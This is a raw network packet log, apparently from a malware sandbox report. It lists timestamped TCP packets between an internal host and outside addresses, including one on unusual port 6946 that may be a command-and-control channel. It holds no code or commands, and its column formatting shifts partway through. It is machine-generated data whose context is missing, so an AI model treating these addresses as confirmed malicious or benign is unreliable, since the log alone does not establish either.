                                                                                                            Nov 20, 2024 16:58:13.231692076 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.232291937 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.232598066 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.232639074 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.234011889 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.234322071 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.234364033 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.235004902 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235022068 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235034943 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235048056 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235059023 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235060930 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.235071898 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.235629082 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235641956 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.235671997 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.235677004 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.236541033 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.236583948 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.236706972 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.237685919 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.237728119 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.237807035 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.238611937 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.238651037 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.238723040 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.239662886 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.239702940 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.239907980 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.240957975 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.240998030 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:13.241048098 CET8049175192.3.220.29192.168.2.22
Timestamp                            Src Port  Dst Port  Source IP       Dest IP
Nov 20, 2024 16:58:13.245584011 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.245668888 CET  49175  80     192.168.2.22    192.3.220.29
Nov 20, 2024 16:58:13.246634007 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.246645927 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.246656895 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.246668100 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.246679068 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.246721029 CET  49175  80     192.168.2.22    192.3.220.29
Nov 20, 2024 16:58:13.247683048 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.247695923 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.247740030 CET  49175  80     192.168.2.22    192.3.220.29
Nov 20, 2024 16:58:13.248869896 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.248883009 CET  80     49175  192.3.220.29    192.168.2.22
Nov 20, 2024 16:58:13.248922110 CET  49175  80     192.168.2.22    192.3.220.29
Nov 20, 2024 16:58:13.336827993 CET  49175  80     192.168.2.22    192.3.220.29
Nov 20, 2024 16:58:13.350585938 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.350678921 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.350709915 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.354347944 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.354367971 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.354388952 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.354397058 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.354409933 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.354419947 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.354451895 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.354460001 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.361723900 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.361752033 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.361788988 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.361797094 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.361819983 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.364103079 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.364123106 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.364168882 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.364176035 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.364197016 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.367355108 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.367405891 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.367429972 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.367436886 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.367502928 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.370498896 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.370580912 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.370605946 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.373961926 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.374025106 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.374033928 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.377002001 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.377063990 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.377074957 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.380213976 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.380279064 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.380289078 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.384311914 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.384378910 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.384391069 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.387545109 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.387615919 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.387631893 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.390352011 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.390429974 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.390444994 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.392875910 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.392952919 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.392966986 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.394620895 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.394679070 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.394695044 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.397594929 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.397649050 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.397665024 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.400585890 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.400649071 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.400662899 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.570988894 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571079969 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571104050 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571190119 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571211100 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571230888 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571235895 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571249008 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571263075 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571310043 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571326017 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571465015 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571482897 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571501017 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571511030 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571523905 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571528912 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571571112 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571578026 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571710110 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571762085 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571772099 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571779013 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571818113 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571866035 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571887016 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.571929932 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.571937084 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.573066950 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.573132992 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.573143959 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.576617956 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.576705933 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.576723099 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.580374956 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.580482006 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.580497980 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.584177971 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.584255934 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.584270954 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.587136030 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.587229967 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.587244034 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.590143919 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.590151072 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.590174913 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.590205908 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.593516111 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.593673944 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.593691111 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.596162081 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.596240997 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.596256971 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.596892118 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.600071907 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.600155115 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.600171089 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.603193045 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.603269100 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.603281975 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.608048916 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.608115911 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.608130932 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.699347973 CET  49176  6946   192.168.2.22    192.3.101.149
Nov 20, 2024 16:58:13.761365891 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.761473894 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.761497021 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.764487982 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.764508009 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.764542103 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.764555931 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.764585972 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.764597893 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.764625072 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.768523932 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.768538952 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.768595934 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.768609047 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.771297932 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.771325111 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.771364927 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.771380901 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.771392107 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.774508953 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.774554968 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.774576902 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.774595022 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.774631977 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.778291941 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.778306007 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.778358936 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.778373003 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.781233072 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.781296015 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.781306982 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.784399033 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.784456968 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.784470081 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.788198948 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.788261890 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.788275003 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.791693926 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.791770935 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.791784048 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.792327881 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.792386055 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.792393923 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.794619083 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.794687033 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.794697046 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.798532009 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.798595905 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.798609018 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.805310011 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.805377007 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.805377007 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.805396080 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.805435896 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.805447102 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.818897963 CET  6946   49176  192.3.101.149   192.168.2.22
Nov 20, 2024 16:58:13.818988085 CET  49176  6946   192.168.2.22    192.3.101.149
Nov 20, 2024 16:58:13.826441050 CET  49176  6946   192.168.2.22    192.3.101.149
Nov 20, 2024 16:58:13.946084023 CET  6946   49176  192.3.101.149   192.168.2.22
Nov 20, 2024 16:58:13.961308956 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.961388111 CET  49174  443    192.168.2.22    142.215.209.78
Nov 20, 2024 16:58:13.961414099 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.963056087 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.963085890 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.963108063 CET  443    49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:13.963116884 CET  49174  443    192.168.2.22    142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.963135004 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.963143110 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.963187933 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.963200092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.967057943 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.967075109 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.967107058 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.967123032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.967134953 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.970125914 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970138073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970175028 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.970189095 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.970199108 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.972875118 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.972891092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.972928047 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.972939014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.974019051 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.974076033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.974085093 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.976533890 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.976588964 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.976598024 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.979516029 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.979561090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.979573011 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.982604980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.982661963 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.982676983 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.986531019 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.986593008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.986613989 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.990170956 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.990225077 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.990242004 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.992889881 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.992940903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.992954016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.996063948 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.996124983 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.996134996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.999834061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:13.999890089 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:13.999902010 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.002906084 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.002955914 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.002966881 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.006150961 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.006232023 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.006247997 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.158674955 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.158812046 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.158832073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.160975933 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.160988092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161014080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161036968 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.161058903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.161127090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.164865017 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164882898 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164926052 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.164971113 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.164971113 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.167957067 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.167980909 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.168039083 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.168039083 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.168059111 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171107054 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171154022 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171210051 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.171230078 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.171372890 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.174886942 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.174909115 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.174977064 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.174995899 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.177902937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.177980900 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.177998066 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.181253910 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.181334972 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.181349993 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.184937954 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.185173035 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.185193062 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.188251972 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.188338041 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.188355923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.191354036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.191446066 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.191462040 CET44349174142.215.209.78192.168.2.22
